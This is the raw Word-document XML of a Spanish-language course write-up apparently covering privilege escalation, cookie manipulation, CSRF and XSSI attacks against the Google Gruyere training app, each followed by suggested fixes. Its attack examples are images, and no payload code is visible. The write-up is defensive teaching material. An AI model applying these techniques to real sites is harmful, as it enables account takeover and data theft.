    <w:p w14:paraId="1849F39B" w14:textId="739656CF" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698D3C35" w14:textId="14ACC91E" w:rsidR="007A5168" w:rsidRPr="007A5168" w:rsidRDefault="007A5168" w:rsidP="007A5168">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="007A5168">
        <w:t>La elevación de privilegios, por otro lado, se refiere a la capacidad de un atacante para aumentar su nivel de acceso a un sistema informático. En un sistema seguro, los usuarios tienen acceso sólo a los recursos y datos necesarios para realizar sus tareas. Sin embargo, si un atacante puede obtener acceso no autorizado a un sistema, puede intentar elevar su nivel de privilegio para obtener acceso a información o recursos adicionales que normalmente no estarían disponibles para él. Esto se puede lograr a través de la explotación de vulnerabilidades en el sistema, como errores de diseño, errores de configuración o errores de programación. La elevación de privilegios también puede ser una parte importante de un ataque de cadena de explotación, donde un atacante aprovecha varias vulnerabilidades en una secuencia para obtener acceso no autorizado al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D3EEB3" w14:textId="18793FB7" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8E1E87" w14:textId="09ADB26B" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Este ataque se produce en el caso de esta aplicación cuando un usuario pasa a tener privilegios que no debería</w:t>
      </w:r>
      <w:r w:rsidR="00F62A18">
        <w:t>, como podemos ver en este ejemplo en Gruyere:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A2593B" w14:textId="5A462CA2" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00C524D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="512B3AE3" wp14:editId="15B35BCA">
            <wp:extent cx="5400040" cy="2902585"/>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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5293C" w14:textId="77777777" w:rsidR="00F62A18" w:rsidRDefault="00F62A18" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D445233" w14:textId="5BF5EC85" w:rsidR="00F62A18" w:rsidRDefault="00F62A18" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00980C2A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EDA9B9A" wp14:editId="6371E863">
            <wp:extent cx="5400040" cy="272542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2725420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F9DDC" w14:textId="2ED7B7D8" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B4B8C8" w14:textId="72F5AE1C" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Para solucionarlo se debería mirar que no pudiera ejecutar una URL sin derechos de administrador o los que fueran pertinentes, y pasar de ser un usuario normal a Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56255B09" w14:textId="722253A4" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EF9F95" w14:textId="68C9EB45" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2553B599" w14:textId="176A67E8" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6820E108" w14:textId="77777777" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C78A7AE" w14:textId="2BC578BB" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420404BA" w14:textId="53C74273" w:rsidR="007A5168" w:rsidRDefault="00AC314A" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>En cuanto a la manipulación de cookies,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC314A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>modificando parámetros dentro de las cookies se consigue cambiar un usuario sin derechos de administración</w:t>
      </w:r>
      <w:r w:rsidR="007A5168">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D2160" w14:textId="1EDF41AD" w:rsidR="007A5168" w:rsidRPr="007A5168" w:rsidRDefault="007A5168" w:rsidP="007A5168">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="007A5168">
        <w:t>La manipulación de cookies se refiere a la capacidad de un atacante para modificar los valores de las cookies almacenadas en el navegador de un usuario. Las cookies son pequeños archivos de texto que se utilizan para almacenar información del usuario en el navegador web, como las preferencias de usuario y la información de inicio de sesión. Si un atacante es capaz de manipular estas cookies, puede modificar la información que se almacena en ellas y, por lo tanto, obtener acceso no autorizado a la cuenta del usuario. Esto se puede lograr a través de la interceptación de tráfico de red o de la explotación de vulnerabilidades en la aplicación web</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF7E04" w14:textId="76C239BD" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142E0325" w14:textId="77777777" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E189928" w14:textId="59C73A99" w:rsidR="00AC314A" w:rsidRDefault="007A5168" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00AC314A">
        <w:t>omo podemos ver en este ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FD29A" w14:textId="77777777" w:rsidR="007A5168" w:rsidRDefault="007A5168" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431B6B35" w14:textId="0DECB1D0" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="0031064F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6E3F12" wp14:editId="575B0477">
            <wp:extent cx="5400040" cy="5154507"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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4663" cy="5158920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B57274" w14:textId="20B87A8F" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C30085A" w14:textId="59BD70A9" w:rsidR="00F62A18" w:rsidRDefault="00F62A18" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E367939" w14:textId="4AD54C0F" w:rsidR="00F62A18" w:rsidRDefault="00F62A18" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EFAE2B" w14:textId="53BDBD77" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311A70F2" w14:textId="5E6BD146" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164D0746" w14:textId="0DBB5BA5" w:rsidR="00AC314A" w:rsidRDefault="00AC314A" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Una manera fácil de solucionarlo en este caso es no guardar si un usuario es administrador dentro de una cookie, pues cualquiera puede modificarla, se debería guardar en la base de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B76FAD" w14:textId="03443C88" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD2EA78" w14:textId="759A597F" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc128034199"/>
      <w:r>
        <w:t>XSRF/CSFR</w:t>
      </w:r>
      <w:r w:rsidR="00A40D6B">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="4B3479FA" w14:textId="3738382C" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CFCD59" w14:textId="3CC621D2" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId351" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/csrf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295CE3E2" w14:textId="0F290B12" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D6CDF0" w14:textId="77777777" w:rsidR="009C57D1" w:rsidRPr="009C57D1" w:rsidRDefault="009C57D1" w:rsidP="009C57D1">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="009C57D1">
        <w:t xml:space="preserve">La vulnerabilidad XSRF (también conocida como CSRF) es un tipo de ataque que aprovecha la confianza que un sitio web tiene en el navegador del usuario para realizar acciones maliciosas. El ataque XSRF aprovecha el hecho de que los navegadores web automáticamente incluyen las cookies de autenticación en todas </w:t>
      </w:r>
      <w:r w:rsidRPr="009C57D1">
        <w:lastRenderedPageBreak/>
        <w:t>las solicitudes HTTP enviadas a un servidor, independientemente del origen de la solicitud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A777E2" w14:textId="77777777" w:rsidR="009C57D1" w:rsidRPr="009C57D1" w:rsidRDefault="009C57D1" w:rsidP="009C57D1">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="009C57D1">
        <w:t>En un ataque XSRF, un atacante crea una página web maliciosa que incluye código que envía una solicitud HTTP a un sitio web objetivo en nombre del usuario, sin que el usuario se dé cuenta. La solicitud se realiza utilizando la cookie de autenticación del usuario, lo que permite al atacante realizar acciones maliciosas en nombre del usuario, como cambiar su contraseña o enviar dinero a una cuenta bancaria controlada por el atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A5F19" w14:textId="213F0658" w:rsidR="009C57D1" w:rsidRDefault="009C57D1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E323A8" w14:textId="77777777" w:rsidR="009C57D1" w:rsidRDefault="009C57D1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD17BD6" w14:textId="265E6A84" w:rsidR="00D73B9D" w:rsidRDefault="009C57D1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Resumiendo e</w:t>
      </w:r>
      <w:r w:rsidR="00D73B9D">
        <w:t>s un ataque que fuerza a un usuario a ejecutar acciones no deseadas en una aplicación web en la que esta autentificado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227B1985" w14:textId="678EC58D" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3DA1F0" w14:textId="48F6F071" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En el ejemplo del ataque a Google Grueyre, mediante XSS almacenado (XSS </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>que es permanente que queda guardado en la base de datos de la aplicación web), se ejecuta un código que borra todos los fragmentos del usuario en cuestión:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447308A0" w14:textId="77777777" w:rsidR="009C57D1" w:rsidRDefault="009C57D1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63360A48" w14:textId="5D269B46" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00597BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B6CEB4" wp14:editId="2A15CCE2">
            <wp:extent cx="5400040" cy="2902585"/>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902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1FB3D5" w14:textId="15EBDC1D" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00597BAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FB2E842" wp14:editId="177F9E62">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467F517" w14:textId="733241CD" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A135C7E" w14:textId="385D916C" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Lo primero que tendríamos que hacer aquí igual que cuando subimos un archivo al servidor, deberemos filtrar que se puede subir, y en este caso que se puede subir JavaScript, no es una buena opción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0AFED" w14:textId="3A016FC7" w:rsidR="002B77F1" w:rsidRDefault="002B77F1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Además de eso cambiar en toda la aplicación las partes que no deberían usar GET por POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429E654" w14:textId="1DCCE324" w:rsidR="002B77F1" w:rsidRDefault="002B77F1" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Uso de tokens CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00A40D6B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832B11F" w14:textId="2BC1D252" w:rsidR="00A40D6B" w:rsidRDefault="00A40D6B" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AE6862" w14:textId="66A3D201" w:rsidR="00A40D6B" w:rsidRDefault="00A40D6B" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc128034200"/>
      <w:r>
        <w:t>XSSI-&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="35BC6268" w14:textId="2AA25BA7" w:rsidR="00A40D6B" w:rsidRDefault="00A40D6B" w:rsidP="00A40D6B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId352" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.tenable.com/plugins/was/113016</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2ECBC" w14:textId="5260C4AF" w:rsidR="00622117" w:rsidRDefault="00622117" w:rsidP="00A40D6B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A99CFAB" w14:textId="77777777" w:rsidR="00622117" w:rsidRPr="00622117" w:rsidRDefault="00622117" w:rsidP="00622117">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00622117">
        <w:t xml:space="preserve">La vulnerabilidad XSSI (también conocida como Cross-Site Script Inclusion) es una vulnerabilidad que puede permitir a un atacante obtener información sensible de un usuario a través de una solicitud HTTP incluida en una página web maliciosa. La </w:t>
      </w:r>
      <w:r w:rsidRPr="00622117">
        <w:lastRenderedPageBreak/>
        <w:t>vulnerabilidad XSSI es una variante de la vulnerabilidad XSS (Cross-Site Scripting) que se enfoca en la inclusión de scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0CA2E" w14:textId="77777777" w:rsidR="00622117" w:rsidRPr="00622117" w:rsidRDefault="00622117" w:rsidP="00622117">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00622117">
        <w:t>La vulnerabilidad XSSI se produce cuando un sitio web incluye una respuesta HTTP en una página web utilizando JavaScript. Si la respuesta HTTP es en formato JSON, el atacante puede aprovechar esta vulnerabilidad para obtener información sensible que normalmente no estaría disponible a través de una solicitud HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419389A" w14:textId="77777777" w:rsidR="00622117" w:rsidRPr="00622117" w:rsidRDefault="00622117" w:rsidP="00622117">
      <w:pPr>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00622117">
        <w:t>El ataque funciona de la siguiente manera: el atacante crea una página web maliciosa que incluye un script que realiza una solicitud HTTP a un sitio web objetivo en nombre del usuario, utilizando cookies de autenticación o credenciales almacenadas en el navegador del usuario. Si la respuesta HTTP es en formato JSON y el sitio web no implementa medidas de seguridad adecuadas, el atacante puede obtener información sensible de la respuesta, como el número de tarjeta de crédito o la dirección de correo electrónico del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656645FD" w14:textId="77777777" w:rsidR="00622117" w:rsidRDefault="00622117" w:rsidP="00A40D6B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAE3D05" w14:textId="77777777" w:rsidR="00D73B9D" w:rsidRDefault="00D73B9D" w:rsidP="00D73B9D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694850B4" w14:textId="78AB82B0" w:rsidR="00AC314A" w:rsidRDefault="00622117" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>En resumen,</w:t>
      </w:r>
      <w:r w:rsidR="00C331F5">
        <w:t xml:space="preserve"> es una taque similar al CSRF, en este caso se quieren filtrar datos confidenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE843F7" w14:textId="77777777" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2937FD40" w14:textId="1B926227" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>En el ataque sobre Gruyere, lo que vamos a filtrar son los datos de los fragmentos privados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CC3201" w14:textId="09A74747" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71662C62" w14:textId="3B8446C7" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00410981">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EF3D5D" wp14:editId="740CBAC1">
            <wp:extent cx="5400040" cy="2501265"/>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2501265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C176F" w14:textId="6B3BE0AD" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73274781" w14:textId="793F4509" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Para impedirlo podríamos usar tokens CSFR, usar POST lo que evitar cargar etiquetas de JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B486455" w14:textId="57273B4B" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Y usar sanitize para impedir que no se ejecute el script añadiéndolo signos para que falle en su ejecución, como por ejemplo prefijos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A8963" w14:textId="701545F9" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2A4555" w14:textId="420F2FE2" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc128034201"/>
      <w:r>
        <w:t>Path Transversal-&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="5BACC23F" w14:textId="3933A0CF" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CACEEDB" w14:textId="71D27F20" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId353" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/Path_Traversal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471973F" w14:textId="77777777" w:rsidR="00C331F5" w:rsidRDefault="00C331F5" w:rsidP="00C331F5">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
